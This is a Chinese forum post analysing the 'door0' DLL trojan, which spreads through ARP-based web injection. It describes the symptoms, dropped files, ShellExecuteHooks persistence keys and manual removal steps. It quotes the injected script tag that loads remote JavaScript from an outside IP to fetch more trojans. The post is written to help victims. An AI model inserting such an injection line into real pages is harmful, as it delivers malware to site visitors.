变名door0恶意dll木马(arp挂马)详解
<p>不是 arp 欺骗 是arp挂马 <br/><br/>arp挂马的意思是说 只要你浏览他设定的网页 全部带有挂马信息 如果你在本机开了服务器,别人浏览你的网站 同样会带有挂马信息 但是你打开你本机上的网站源代码却没有这些挂马语句。<br/><br/>我也中了这个木马 不过是在虚拟机下中的 现正在研究中<br/><br/>中毒现象为:<br/>1、用IE内核浏览器浏览百度 瑞星 等等网站时 网页头部会被嵌入 <br/><script src=http://67.19.116.187/1.js><br/><br/>2、上面那个文件是用来下载其他木马 主木马和所下载木马全为dll木马 主木马只有一个功能:就是进行欺骗 使之下载其他木马 <br/>感染主木马后重起一次后生效,开始下载辅助木马,这个主木马也是隐藏最深的。它也会使所有使用javascript的页面受到部分影响比如我的百度空间就 没办法发表文章了。<br/><br/>3、再来说说后来下载的这些辅助木马 <br/> <br/>这些木马位置为:系统盘:\Documents and Settings\当前用户名\Local Settings\Temp 下<br/><br/> 建立 1.exe~11.exe 以及两个~*.tmp文件。<br/> 在%systemroot%下建立<br/> wodoor0.dll<br/> dhdoor0.dll<br/> qjdoor0.dll<br/> wddoor0.dll<br/> tldoor0.dll<br/> zxdoor0.dll<br/> mydoor0.dll。<br/><br/> 这些dll文件会把自己插入到 explorer 进程中,如果你启动regedit它们同样会被插入到regedit中<br/> 同时在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks 下 建立启动项:<br/> {08E909A4-B236-48DD-8BCC-90A604B93E68} 数值为:hook tl<br/> {0DAEBA6A-86CA-4B96-AF96-0C8C2C358FBD} 数值为:hook dh3<br/> {4E3FBFA4-F1CC-4B66-B333-B9F0FF4B4748} 数值为:hook my<br/> {5731EA1D-6AAF-4DE9-BDDA-7B390A75B286} 数值为:hook wo<br/> {6826A3DB-EA8E-4E67-880D-53D04C7C0BD8} 数值为:hook qj<br/> {781FBCC1-99C7-4AE0-95F7-66EA49E86DD7} 数值为:hook zx<br/></p><p><span class="bold">治标不治本的解决办法</span><br/><br/></p><div class="t_msgfont" id="message1399288">1.如果你管理员用户有两个(没有的话现建个),进入HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks 点右键->权限 找到你当前登陆的用户名 将 <b>完全控制</b>和<b>读取</b> 两个属性 勾上拒绝! 然后再找到regedit.exe-->创建快捷方式 在属性-->高级里 选上 用其他用户打开 双击这个快捷方式,输入你另一个管理员帐号和密码 把 ShellExecuteHooks 下 那几个键值删除。<br/><br/>2. 和上面同样原理,设置 system32目录的安全选项卡(右键--属性---安全[安全选项只有NTFS分区才有,如果你是NTFS分区又没有安全这一选项,请在"工具-文件夹选项--查看"里把"简单文件共享"前面的点 去掉])将当前用户权限的 完全控制 点上拒绝,然后找一个能进行文件操作的程序 譬如:冰刃 创建快捷方式,用其他用户打开,然后现在的用户用进程管理器将explorer结束,再然后使用冰刃 删除掉 system32下的那些*hook.dll文件。<br/><br/>3、清空Temp文件夹,删除windows下的~*.tmp文件4、打上系统补丁,使用非IE内核的浏览器上网。<br/><br/>这只是治标不治本的方法,那个主要的病毒依然存在,网页依然有嵌入的挂马语句, 用IE内核浏览器还可能再下载其他病毒。<br/><br/>我发现了几个主病毒的可疑位置,再看看 一会把它们发上来。</div>
页:
[1]